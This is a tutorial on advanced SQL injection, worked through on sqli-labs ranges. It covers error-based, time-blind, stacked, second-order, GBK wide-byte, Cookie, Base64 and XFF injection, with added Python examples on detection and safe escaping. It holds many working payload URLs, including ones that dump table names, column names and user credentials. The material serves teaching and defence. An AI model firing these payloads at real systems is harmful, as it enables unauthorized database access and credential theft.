2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article introduces advanced SQL injection techniques in web security. The content is detailed and easy to follow, the operations are simple and quick, and it has some reference value. I believe you will gain something from reading it. Let's take a look.
The basic lookups used throughout are listed first. The reason limit is added is that sqli-labs restricts the number of echoed rows; it should not be relied on in real engagements.

select schema_name from information_schema.schemata limit 0,1 // enumerate databases
(select table_name from information_schema.columns where table_schema='whc' limit m,n) // enumerate tables
(select column_name from information_schema.columns where table_schema='whc' limit 0,1) // enumerate columns

1. Floor method
Usage:
select 1, count(*), concat(0x3a, 0x3a, (select user()), 0x3a, 0x3a, floor(rand(0)*2)) a from information_schema.columns group by a
Function definition:
rand(): random number function, returns a random number between 0 and 1
count(*): counts rows
floor(): rounds down, discarding the fractional part, e.g. floor(1.3) = 1; floor(rand()*2) therefore yields only 0 or 1
group by name: groups the rows by name, in dictionary order of name
concat(): joins the contents inside its parentheses
select 1 from (table name): derived table
Three things matter here: count() for counting, floor() to obtain 0 or 1 so that data repeats, and group by for grouping. Explanations of the exact principle are usually poor; roughly, the error is caused by duplicate keys when repeated data is counted after grouping (it is also described as a MySQL bug). Note that rand(0) and rand() behave differently and may need a few tries.
Actual list:
Test on sqli-labs Less-5
Only user() is used as the example here; to dump tables or columns, replace user() with the corresponding subquery.
id=1' union select 1 from (select count(*), concat(0x3a, 0x3a, user(), 0x3a, 0x3a, floor(rand(0)*2)) a from information_schema.columns group by a) b--+
It can be simplified like this:
id=1' and (select count(*) from information_schema.tables group by concat(0x3a, 0x3a, version(), 0x3a, 0x3a, floor(rand(0)*2)))--+
It can also be changed to this:
id=1' and (select 1 from (select count(*), concat(0x3a, user(), 0x3a, floor(rand()*2)) name from information_schema.tables group by name) b)--+
Statement decomposition:
(select 1 from b) // b is the derived table
b = select count(*), name from information_schema.tables group by name // select the content and its count from information_schema
name = concat(0x3a, (query content), 0x3a, floor(rand()*2)) // join ":", the query content and a random integer
Why exactly count(*), floor(rand(0)*2) and group by produce the error: all three elements must appear in one statement for the error to occur.
What select 1 from table does:
It adds a temporary column whose value in every row is the number written after select; in this SQL statement it is 1.
The difference between rand(0), rand(1) and rand():
rand() errors randomly, that is, sometimes it does and sometimes it does not; rand(0) always errors; rand(1) never errors.
So to force the error, use rand(0) directly.
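Why all three parts are needed, as an added illustration that is not code from the page: the Python model below imitates how MySQL's GROUP BY fills its temporary table when the group key is a volatile expression. The leading values of floor(rand(0)*2) are a constructed list copied from the commonly documented MySQL output, and the two-evaluation behaviour is a model, not MySQL's code. It shows why the error is reliable with rand(0) on a table of three or more rows, and why a key that evaluates the same way twice never errors.

```python
# Added illustration: a simplified model of MySQL GROUP BY with a volatile key.
# Not MySQL's code; the rand(0) values are a constructed list.
from typing import Dict, Iterator


class DuplicateEntryError(Exception):
    """Stands in for MySQL error 1062, 'Duplicate entry ... for key group_key'."""


def rand0_floor_sequence() -> Iterator[int]:
    """Leading values of floor(rand(0)*2).

    rand(0) is seeded, so MySQL produces the same sequence on every run. The
    list is constructed from the commonly documented output; it is not computed.
    """
    yield from [0, 1, 1, 0, 1, 1, 0, 0, 1, 1]


def group_by_with_volatile_key(row_count: int, key_values: Iterator[int]) -> Dict[int, int]:
    """Model GROUP BY over row_count rows, consuming one key value per evaluation.

    For each row MySQL evaluates the key expression to look the group up in
    its temporary table. If the group is missing, it evaluates the expression
    again while inserting the new group. With floor(rand()*2) the second value
    can differ from the first, so the insert can collide with a group that
    already exists: that collision is the duplicate-key error. count(*) is
    what makes this an aggregate query that needs the temporary table, and
    group by is what makes the key unique in it.
    """
    groups: Dict[int, int] = {}
    for _ in range(row_count):
        lookup_key = next(key_values)
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = next(key_values)  # second evaluation of the same expression
        if insert_key in groups:
            raise DuplicateEntryError(f"Duplicate entry '{insert_key}' for key 'group_key'")
        groups[insert_key] = 1
    return groups


def rows_needed_for_error(max_rows: int = 10) -> int:
    """Smallest source-table size at which rand(0) triggers the error (0 if never)."""
    for n in range(1, max_rows + 1):
        try:
            group_by_with_volatile_key(n, rand0_floor_sequence())
        except DuplicateEntryError:
            return n
    return 0


if __name__ == "__main__":
    print("rows needed with rand(0):", rows_needed_for_error())
    print("stable key never errors:", group_by_with_volatile_key(5, iter([0] * 10)))
```

Because the key is re-evaluated only when a group is missing, a one- or two-row source table never errors with rand(0), which is why the payloads above select from information_schema.columns rather than from a small table. The same model explains the page's observation about rand(): an unseeded sequence sometimes produces a collision and sometimes does not.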
2. XPath functions:
The two main functions:
Available from MySQL 5.1.5:
Updatexml (): query and modify xml
Extractvalue (): query and modify xml
Both return at most 32 characters.
and updatexml(1, concat(0x26, (version()), 0x26), 1)
and (extractvalue(1, concat(0x26, (version()), 0x26)))
sqli-labs Less-5 test:
Updatexml ():
http://192.168.1.180/sqli-labs/Less-5/?id=1' and updatexml(1, concat(0x26, database(), 0x26), 1);--+
Extractvalue ():
http://192.168.1.180/sqli-labs/Less-5/?id=1' and extractvalue(1, concat(0x26, database(), 0x26));--+
Time-based blind injection
It differs from Boolean injection in that time-based injection uses functions such as sleep() or benchmark() to make MySQL take longer to execute.
Time-based blind injection is usually combined with IF(expr1, expr2, expr3): if expr1 is TRUE, IF() returns expr2; otherwise it returns expr3.
http://43.247.91.228:84/Less-9/?id=1' and if(length(database())>1, sleep(5), 1)%23 // determine the length of the database name
http://43.247.91.228:84/Less-9/?id=1' and if(substr(database(),1,1)='s', sleep(5), 1)%23 // test the first character of the database name
Online practice range
Here the page does not change between id=1' and id=1, which shows that the previous injection methods, including Boolean blind injection, do not work.
To try time-based blind injection, use the MySQL built-in function sleep(5), which delays execution by 5 seconds (each database has its own delay function).
Use F12 (the browser developer tools) to see how long the site normally takes to process this request.
Verifying time-based blind injection
Request http://43.247.91.228:84/Less-9/?id=1 : response time under 1 second.
Request http://43.247.91.228:84/Less-9/?id=1' and sleep(5)%23 : response time 5 seconds.
Use Burp to capture the request and brute-force the letters a-z to obtain the database name.
Time-based injection code analysis
In the time-based injection page, the program gets the GET parameter id, uses preg_match to check whether the parameter contains dangerous keywords such as union, and then splices the parameter into the SQL statement. The statement is run against the database and the page returns yes if there is a result and no otherwise. The page therefore only ever displays yes or no, never data from the database; the difference from Boolean injection is that keywords such as sleep are not filtered here.
Visiting id=1' and if(ord(substring(user(),1,1))=114, sleep(3), 1)%23
Because user() is root and the ASCII value of its first character 'r' is 114, the if condition in the SQL statement is true and sleep(3) is executed, so the page is delayed by 3 seconds. The result of the SQL statement can be judged from this delay.
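From the defender's side, the two signals of the technique just described are the delay primitives in the request and the delay in the response. The added example below (not code from the page) parses a few constructed access-log lines in combined format with the request duration appended, URL-decodes the path, and separates requests that carry a sleep()/benchmark() signature from requests that are merely slow.

```python
# Added example: flagging time-based blind injection attempts in access logs.
# The log lines are constructed. Format: combined log format followed by the
# request duration in seconds (nginx $request_time style).
import re
from typing import Dict, List
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:00:01 +0000] "GET /Less-9/?id=1 HTTP/1.1" 200 712 0.012
10.0.0.9 - - [12/May/2024:10:00:07 +0000] "GET /Less-9/?id=1%27%20and%20sleep(5)%23 HTTP/1.1" 200 712 5.014
10.0.0.9 - - [12/May/2024:10:00:15 +0000] "GET /Less-9/?id=1%27%20and%20if(length(database())%3E1,sleep(5),1)%23 HTTP/1.1" 200 712 5.021
10.0.0.9 - - [12/May/2024:10:00:22 +0000] "GET /Less-9/?id=1%27%20and%20if(substr(database(),1,1)%3D%27x%27,sleep(5),1)%23 HTTP/1.1" 200 712 0.011
10.0.0.7 - - [12/May/2024:10:00:30 +0000] "GET /report.php?range=30 HTTP/1.1" 200 9981 6.302
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) (?P<secs>\d+\.\d+)$'
)
# The MySQL delay primitives named on the page; matched after URL decoding so
# that percent-encoded payloads are not missed.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
IF_RE = re.compile(r"\bif\s*\(", re.IGNORECASE)


def parse_line(line: str) -> Dict:
    """Parse one log line into fields; returns {} for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return {}
    entry = m.groupdict()
    entry["secs"] = float(entry["secs"])
    entry["decoded"] = unquote_plus(entry["path"])
    return entry


def classify(entry: Dict, slow_threshold: float = 3.0) -> List[str]:
    """Reasons a request is worth a look: payload signature and/or slow response."""
    reasons = []
    if DELAY_RE.search(entry["decoded"]):
        reasons.append("delay-function")
        if IF_RE.search(entry["decoded"]):
            reasons.append("conditional-delay")
    if entry["secs"] >= slow_threshold:
        reasons.append("slow-response")
    return reasons


def find_suspects(log_text: str, slow_threshold: float = 3.0) -> Dict[str, List[Dict]]:
    """Split hits into signature matches and slow requests without a signature.

    A false condition (fourth line) returns quickly, so timing alone would miss
    it; a slow report page (last line) carries no payload, so the signature
    alone would not raise it. Both lists deserve review, for different reasons.
    """
    result: Dict[str, List[Dict]] = {"signature": [], "slow_without_signature": []}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        reasons = classify(entry, slow_threshold)
        hit = {"ip": entry["ip"], "path": entry["decoded"], "secs": entry["secs"], "reasons": reasons}
        if "delay-function" in reasons:
            result["signature"].append(hit)
        elif "slow-response" in reasons:
            result["slow_without_signature"].append(hit)
    return result


if __name__ == "__main__":
    for bucket, hits in find_suspects(SAMPLE_LOG).items():
        for hit in hits:
            print(bucket, hit["ip"], hit["secs"], hit["reasons"], hit["path"])
```

Keying on the decoded request rather than the raw line matters: the page's payloads arrive percent-encoded, and a substring match on the raw path would miss `%20sleep` variants with different encodings of the surrounding characters. The slow-without-signature bucket is where a sleep() hidden inside a Cookie or other header would show up, since this parser only sees the request line.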
Stacked query injection attack
Stacked queries can execute multiple statements separated by semicolons (;). Stacked query injection takes advantage of this feature.
'; select if(substr(user(),1,1)='r', sleep(3), 1)%23 // obtain data using stacked injection
'; select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e', sleep(3), 1)%23 // obtain a table name using stacked injection
Stacked query injection code analysis
In the stacked injection page, the program gets the GET parameter id and uses PDO to query the data, but still splices the parameter id into the query string, so PDO's prepared statements have no effect and the program still has a SQL injection vulnerability.
When PDO executes SQL, multiple statements can be run, but the injection result is usually not returned directly, because PDO only returns the result of the first SQL statement; so the second statement is used either to modify data with update or to extract data by time-based blind injection. Visiting dd.php?id=1';select if(ord(substring(user(),1,1))=114, sleep(3), 1);%23 executes the following SQL:
SELECT * FROM users where 'id'='1';select if(ord(substring(user(),1,1))=114, sleep(3), 1);%23
The SQL is now split in two: the first statement, SELECT * FROM users where 'id'='1', is the code's own select query, and select if(ord(substring(user(),1,1))=114, sleep(3), 1)%23 is the time-based blind statement we constructed.
Secondary injection attack
What is secondary injection?
Secondary injection is injection caused by user input that was first stored (in a database or file), then read back and placed into a SQL query.
Secondary injection is a kind of SQL injection, but it is harder to exploit than ordinary SQL injection and the bar for exploitation is higher.
In ordinary injection the data goes directly into the SQL query; in secondary injection the input is processed and stored, then taken out and enters a SQL query again.
Secondary injection principle
In secondary injection, when the data is first inserted into the database only addslashes or get_magic_quotes_gpc is used to escape special characters; the original data is written to the database intact, so the stored data is still dirty.
Once the data is in the database, the developer assumes it is reliable. When it is needed for the next query, the dirty data is taken straight out of the database without further checking or processing, which results in secondary SQL injection. For example, data containing a single quote is inserted directly into the database the first time, and then, when it is spliced into a statement on the next use, a secondary injection is formed.
Secondary injection attack in practice
Shooting range practice address
An example of secondary injection: sqli-labs Less-24
To learn SQL injection you must work through sqli-labs; here Less-24 is used as the example, and it is exactly the secondary injection case. Open the exercise:
The normal flow of this exercise is to sign up for an account and then, after logging in, change the password:
If you try SQL injection directly at the login form with the payload admin'#, it fails:
Look at the source code:
Both the username and password at login are escaped with mysql_real_escape_string, so the ' is escaped before the SQL statement executes and there is no way to cause SQL injection.
So at this point we sign up for a test'# account:
mysql_escape_string is used to filter the parameters during registration:
But the problem data test'# is still inserted into the database.
In other words, the data escaped by mysql_escape_string is saved in the database in its original form. Here is a test:
Back to the exercise: the original password of the test user is test. We log in as the test'# user and then change the password.
We do not need to fill in the current password to change the test user's password:
Let's take another look at the password of the test user:
Ok, let's look at the source code:
The username is taken directly from the database without escaping. The statement actually executed when updating the password is:
"UPDATE users SET PASSWORD='22' where username='test'#' and password='$curr_pass'"
Because the problem data was stored in the database, and the program later reads it and puts it straight into the statement without a second check, secondary injection results.
Secondary injection code analysis
The following code implements a simple user registration function. The program obtains the GET parameters username and password, splices them into an insert statement and runs it against the database. Because username is escaped with addslashes and password is hashed with MD5, there is no SQL injection vulnerability at this point.
When accessing username=test'&password=123456, the SQL statement executed is:
insert into users('username','password') values('test\'', 'E10ADC3949BA59ABBE56E057F20F883E')
The database then contains a user named test'.
Wide byte injection attack
What is wide byte injection?
Nowadays most programs use Unicode, and websites use UTF-8 as the international standard. But many CMSs, domestic and foreign (especially from non-English-speaking countries), still use their own default encodings such as GBK, and some CMSs ship both GBK and UTF-8 versions for their users. In GBK a Chinese character occupies 2 bytes; in UTF-8 a Chinese character occupies 3 bytes.
The principle of MySQL wide byte injection is that the database uses GBK encoding.
Principle of wide byte injection
GBK occupies two bytes
ASCII occupies one byte
The PHP code uses GBK; the escaping function adds an ASCII character (the added symbol is \); and MySQL's default character set is the wide-byte character set GBK.
We know that %df' is escaped by PHP (with GPC on, addslashes, iconv and so on): a backslash is added before the single quote, giving %df\'. The hex of \ is %5c, so %df\' = %df%5c%27. If the program's default character set is a wide-byte character set such as GBK, MySQL treats %df%5c as one wide character when decoding as GBK. That is, %df\' = %df%5c%27 = one GBK character followed by ', and the single quote is free to inject.
Wide byte injection in practice
sqli-labs Less-32
Test range address
Approach:
Because single quotes are filtered, we use %df to eat the \: since urlencode(\') = %5c%27, adding %df before %5c%27 gives %df%5c%27, and as explained above MySQL treats two bytes as one Chinese character in GBK, so %df%5c becomes a Chinese character and %27 is left outside as a separate symbol, which achieves our goal.
Another approach is to cancel the \ in \': if you can construct %5c%5c%27, the later %5c is escaped by the earlier one. This is also a bypass method.
Injection practice:
(1) Confirm the bypass. The payload is as follows:
http://localhost:81/sqli-labs-master/Less-32/index.php?id=1%df%27 and 1=1--+
(2) Find the number of columns with order by
http://localhost:81/sqli-labs-master/Less-32/index.php?id=1%df%27 order by 4--+
(3) union select query
http://localhost:81/sqli-labs-master/Less-32/index.php?id=0%df%27 union select 1,2,3--+
Everything else is the same. The same steps for Less-33:
http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 and 1=1--+
http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 order by 3--+
http://localhost:81/sqli-labs-master/Less-33/index.php?id=0%df%5c%27 union select 1,2,3--+
http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1,database(),3--+
http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1,(select group_concat(username,password) from users),3--+
Analysis of wide byte injection code
In the wide byte injection page, the program takes the GET parameter id, escapes it with addslashes(), and splices it into the SQL statement for the query.
The SQL statement executed when accessing id=1':
SELECT * FROM users WHERE id='1\''
The single quote is escaped with \, so normally it cannot be injected, but SET NAMES 'GBK' is executed before the database query to set the encoding to wide-byte GBK, which creates the wide byte injection vulnerability.
In PHP, a wide byte injection vulnerability can also arise when transcoding with iconv().
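The byte-level mechanism described above, and the check that closes it, as an added example that is not code from the page. addslashes() is re-implemented here exactly as PHP applies it, per byte, so that the effect of SET NAMES 'gbk' can be shown with Python's gbk codec; the charset-aware variant stands in for what mysql_real_escape_string does once the client charset has been set with mysql_set_charset (the names of the Python functions are this example's own, and the inputs are constructed).

```python
# Added example, not code from the page: the byte-level mechanism of wide-byte
# injection and the charset-aware escaping that closes it. addslashes() is
# re-implemented as PHP applies it (per byte); all inputs are constructed.
from typing import Dict

BYTE_ESCAPES: Dict[int, bytes] = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0"}
CHAR_ESCAPES: Dict[str, str] = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\x00": "\\0"}


def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-oriented escaping: a backslash (0x5c) goes in front of ' " \\ and NUL,
    without regard to the character set the bytes are in."""
    return b"".join(BYTE_ESCAPES.get(b, bytes([b])) for b in raw)


def as_seen_by_gbk_connection(escaped: bytes) -> str:
    """What MySQL makes of the bytes after SET NAMES 'gbk': 0xdf 0x5c is one
    GBK character, so the backslash added above is absorbed into it."""
    return escaped.decode("gbk")


def escape_gbk_aware(raw: bytes) -> bytes:
    """Escape at character level in the connection charset (the job
    mysql_real_escape_string does once mysql_set_charset('gbk') is in effect).
    A lone lead byte without a valid trail byte is not GBK text and is rejected,
    so it can never be glued to the backslash."""
    try:
        text = raw.decode("gbk")
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid GBK text") from exc
    return "".join(CHAR_ESCAPES.get(ch, ch) for ch in text).encode("gbk")


def quote_still_escaped(raw: bytes) -> bool:
    """After naive escaping and GBK decoding, does every quote still carry its backslash?"""
    seen = as_seen_by_gbk_connection(addslashes_bytes(raw))
    return seen.count("'") == seen.count("\\'")


if __name__ == "__main__":
    payload = b"\xdf'"                      # %df%27 from the page
    print(addslashes_bytes(payload))         # b"\xdf\\'"   (%df%5c%27)
    print(as_seen_by_gbk_connection(addslashes_bytes(payload)))   # one CJK character, then a bare quote
    print(quote_still_escaped(payload), quote_still_escaped("张'".encode("gbk")))
```

Two consequences follow. The first is the usual fix list: set the client charset on the connection (mysql_set_charset or the charset in the PDO DSN) so that escaping and decoding agree, or better, parameterize the query and stop escaping strings by hand. The second is why UTF-8 connections are not affected: in UTF-8 every continuation byte is 0x80 or above, so 0x5c can never be the trailing byte of a multi-byte character, and the backslash always survives decoding.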
Cookie injection attack
During development, developers pay attention to preventing malicious users from carrying out injection and filter incoming parameters accordingly, but very often, because their understanding of security differs, some developers filter only the data submitted by GET and POST.
But data is not only submitted in those two ways; another commonly used one is request("xxx"), the Request method.
It also retrieves parameter values from whatever the user submitted, which creates the basic condition for cookie injection: the Request method is used, but the injection protection filters only data submitted by GET and POST.
Cookie injection attack in practice
Range address
This level is an injection in the Cookie. After entering the correct account and password it jumps to the index.php page, as shown below.
Visiting the login page http://43.247.91.228:84/Less-20/ again still shows the page above, because the information is stored in the Cookie after login and the back end checks it: when it finds a value in the Cookie, it shows the personal information instead of the login box. In that information there is an extra Your ID:8, which is very likely queried from the database. We visit the page again and capture the request with Burp for analysis.
There is uname=admin in the Cookie, which suggests the back end uses uname from the cookie to query the database.
Change the Cookie to uname=admin'
The page reports an error, and the error message shows that the back end splices the value inside single quotes. No need to go further: union query, error-based injection and blind injection are all possible here.
Continue with Burp and send Cookie: uname=admin' AND updatexml(1, concat(0x7e, (select username from users LIMIT 1), 0x7e), 1)#
Cookie injection Code Analysis
$_COOKIE reads the data in the browser cookie. In the cookie injection page, the program gets the parameter id from $_COOKIE, splices id directly into the select statement, and if there are results outputs them to the page.
As you can see, there is a SQL injection vulnerability because the parameter id in the cookie is not filtered and is spliced directly into the SQL statement. When id=1 union select 1,2,3%23 is put in the cookie, the SQL statement executed is:
select * from users where 'id'=1 union select 1,2,3%23
The SQL statement is now two parts, select * from users where 'id'=1 and union select 1,2,3, and the second part can be used to obtain data from the database.
Base64 injection attack
Base64 injection code analysis
In the base64 injection page, the program obtains the GET parameter id, decodes it with base64_decode(), splices the decoded $id directly into the select statement, and outputs the query results to the page through a while loop.
Because the code does not filter the decoded $id and splices it directly into the SQL statement, there is a SQL injection vulnerability. When id=1 union select 1,2,3 is accessed (Base64-encoded), the SQL statement executed is:
select * from users where 'id'=1 union select 1,2,3%23
The SQL statement is now two parts, select * from users where 'id'=1 and union select 1,2,3, and the second part can be used to obtain data from the database.
XFF injection attack
XFF injection code analysis
The getenv() function in PHP gets the value of an environment variable, similar to $_SERVER or $_ENV; it returns the value of the variable, or FALSE if the variable does not exist.
The program first determines whether there are HTTP header parameters.
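The Cookie, Base64 and XFF cases above share one root cause: the filter is attached to a particular input channel rather than to the point where the value is used. The added example below, not code from the page, sketches a request handler that fetches a parameter the way an ASP-style Request("xxx") would (query string first, then cookie), decodes Base64 where the page expects it, and validates only after the last decoding step; the X-Forwarded-For value is parsed as an address before it is used at all. The Request class, parameter names and sample values are constructed for this example.

```python
# Added example, not from the page: one place to fetch and validate a request
# parameter, whatever channel delivered it. Request, the parameter names and
# the sample values are constructed; they mirror the page's cases (id via GET,
# Cookie or Base64, client address via X-Forwarded-For).
import base64
import binascii
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Request:
    query: Dict[str, str] = field(default_factory=dict)
    cookies: Dict[str, str] = field(default_factory=dict)
    headers: Dict[str, str] = field(default_factory=dict)


def request_param(req: Request, name: str) -> Optional[str]:
    """ASP-style Request("name"): query string first, then cookie. Merging the
    sources is exactly why a filter applied only to GET/POST is not a filter."""
    if name in req.query:
        return req.query[name]
    return req.cookies.get(name)


def encode_id_base64(value: str) -> str:
    return base64.b64encode(value.encode("utf-8")).decode("ascii")


def decode_id_base64(value: str) -> str:
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("id is not valid base64") from exc


def user_id_for_query(req: Request, base64_encoded: bool = False) -> int:
    """Validate after the last decoding step, then hand the query an int.
    With a parameterized query the value can never alter the statement; the
    allow-list is defence in depth and gives a clean error to log."""
    raw = request_param(req, "id")
    if raw is None:
        raise ValueError("id missing")
    decoded = decode_id_base64(raw) if base64_encoded else raw
    decoded = decoded.strip()
    if not decoded.isdigit():
        raise ValueError("id must be a positive integer")
    return int(decoded)


def client_ip(req: Request, behind_trusted_proxy: bool) -> str:
    """X-Forwarded-For is client-controlled text. Use it only behind a proxy you
    trust, take the last entry (the one that proxy appended), and parse it as an
    address before it goes anywhere near a query or a log line."""
    candidate = req.headers.get("Remote-Addr", "")
    if behind_trusted_proxy and "X-Forwarded-For" in req.headers:
        candidate = req.headers["X-Forwarded-For"].split(",")[-1].strip()
    return str(ipaddress.ip_address(candidate))  # ValueError for anything that is not an address


def safe_client_ip(req: Request, behind_trusted_proxy: bool) -> Optional[str]:
    """None instead of an exception, for callers that only log the address."""
    try:
        return client_ip(req, behind_trusted_proxy)
    except ValueError:
        return None


if __name__ == "__main__":
    print(user_id_for_query(Request(cookies={"id": "8"})))
    print(user_id_for_query(Request(query={"id": encode_id_base64("7")}), base64_encoded=True))
    print(safe_client_ip(Request(headers={"X-Forwarded-For": "203.0.113.7, 10.0.0.2"}), True))
```

Validating the decoded value is the part the page's Base64 page gets wrong: a keyword filter on the raw parameter sees only Base64 text, so it passes everything. Likewise, getenv('HTTP_X_FORWARDED_FOR') is no different from a cookie as far as trust goes; the IP parser rejects anything that is not an address, and a parameterized insert of the parsed string would not care either way.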